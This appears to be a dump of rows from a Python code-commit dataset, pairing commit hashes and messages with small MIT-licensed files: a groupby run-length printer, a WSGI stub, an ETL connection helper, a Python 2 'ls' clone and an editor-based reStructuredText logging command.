# @Author: Zeyuan Shang
# @Date: 2016-05-13 12:35:11
# @Last Modified by: Zeyuan Shang
# @Last Modified time: 2016-05-13 12:35:16
from itertools import groupby
s = raw_input()
for k, g in groupby(s):
print '({}, {})'.format(len(list(g)), k), | mit | Python | |
bf7bfce64b2964cd6adb515788420747fcbedeae | Add an app.wsgi just in case | markpasc/leapreader,markpasc/leapreader | app.wsgi | app.wsgi | #!/usr/bin/env python
import itty
import leapreader
app = itty.handle_request
| mit | Python | |
ada3083c38fe75f139079e93b7c544540fe95e1a | add sources/ package | IuliiSe/openinterests.eu,IuliiSe/openinterests.eu,civicdataeu/openinterests.eu,yaph/openinterests.eu,yaph/openinterests.eu,civicdataeu/openinterests.eu,IuliiSe/openinterests.eu,civicdataeu/openinterests.eu | sources/__init__.py | sources/__init__.py | import sqlaload as sl
from lobbyfacts.core import app
def etl_engine():
return sl.connect(app.config.get('ETL_URL'))
| mit | Python | |
78a8fef6123b81011b3d896af69470d249570b05 | Add ls.py | chrhsmt/system_programming,chrhsmt/system_programming,chrhsmt/system_programming,chrhsmt/system_programming | kadai3/ls.py | kadai3/ls.py | # -*- coding: utf-8 -*-
import sys
import os
import time
import argparse
import re
from tarfile import filemode
import pwd
import grp
parser = argparse.ArgumentParser()
parser.add_argument("path",
metavar="path",
nargs="?",
default="",
type=str,
help="expect shown directory")
parser.add_argument("-a",
action="store_true",
default=False)
parser.add_argument("-i",
action="store_true",
default=False)
parser.add_argument("-l",
action="store_true",
default=False)
args = parser.parse_args()
pattern = re.compile(r'^\..*$')
try:
dir_list = os.listdir("./%s" % args.path)
except OSError as (errorno, error):
sys.exit("python %s: %s: %s" % (sys.argv[0], args.path, error))
if not args.a:
for src in dir_list[:]:
if pattern.match(src):
dir_list.remove(src)
else:
dir_list = [".", ".."] + dir_list
if args.l:
for src in dir_list:
stat = os.stat(args.path + src)
uname = pwd.getpwuid(stat.st_uid).pw_name
gname = grp.getgrgid(stat.st_gid).gr_name
mtime = time.strftime("%m %d %H:%M", time.localtime(stat.st_mtime))
inode = stat.st_ino
if args.i:
print "%s %s %2s %s %s %5d %s %s" % (stat.st_ino, filemode(stat.st_mode), stat.st_nlink, uname, gname, stat.st_size, mtime, src)
else:
print "%s %2s %s %s %5d %s %s" % (filemode(stat.st_mode), stat.st_nlink, uname, gname, stat.st_size, mtime, src)
else:
if args.i:
print "\t".join([ "%s %s" % (os.stat(args.path + src).st_ino, src) for src in dir_list])
else:
print "\t".join(dir_list) | mit | Python | |
0223ae91b669ce12b16d8b89456f3291eeed441e | Add log command. | kivhift/qmk,kivhift/qmk | src/commands/log.py | src/commands/log.py | #
# Copyright (c) 2012 Joshua Hughes <kivhift@gmail.com>
#
import os
import subprocess
import tempfile
import threading
import qmk
import pu.utils
class LogCommand(qmk.Command):
'''Make log entries using restructured text.'''
def __init__(self):
super(LogCommand, self).__init__(self)
self._name = 'log'
self._help = self.__doc__
self._ui = pu.utils.get_user_info()
self._base_dir = os.path.join(qmk.base_dir(), 'logs')
if not os.path.exists(self._base_dir):
os.mkdir(self._base_dir, 0755)
@qmk.capture_and_show_exceptions('log')
def _make_entry(self, type_):
_, entry_tmp_file = tempfile.mkstemp(
prefix = type_, suffix = '.rst', dir = self._base_dir)
os.close(_)
start_time = pu.utils.ISO_8601_time_stamp()
subprocess.call([self._ui.EDITOR, entry_tmp_file])
end_time = pu.utils.ISO_8601_time_stamp()
if 0 == os.stat(entry_tmp_file).st_size:
os.remove(entry_tmp_file)
return
entry_dir = os.path.join(self._base_dir, type_)
if not os.path.exists(entry_dir):
os.mkdir(entry_dir, 0755)
st = start_time.split('-')
YM = '-'.join(st[:2])
entry_file = os.path.join(entry_dir, '%s-%s.rst' % (type_, YM))
write_title = (
not os.path.exists(entry_file)
or 0 == os.stat(entry_file).st_size)
with open(entry_file, 'ab') as fout:
if write_title:
title = '%s log for %s' % (type_, YM)
fout.write('\n'.join((title, '=' * len(title), '', '')))
with open(entry_tmp_file, 'rb') as fin:
fout.write('\n'.join(
(start_time, '-' * len(start_time), '', '')))
for ln in fin:
fout.write(ln.rstrip() + '\n')
fout.write('\n'.join(
('', '.. Editing finished: ' + end_time, '', '')))
os.remove(entry_tmp_file)
def action(self, arg):
if arg is None:
subj = 'work'
else:
subj = arg.strip()
# Don't want to block so fire off a thread to do the actual work.
threading.Thread(target = self._make_entry, args = (subj,)).start()
def commands(): return [ LogCommand() ]
| mit | Python |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.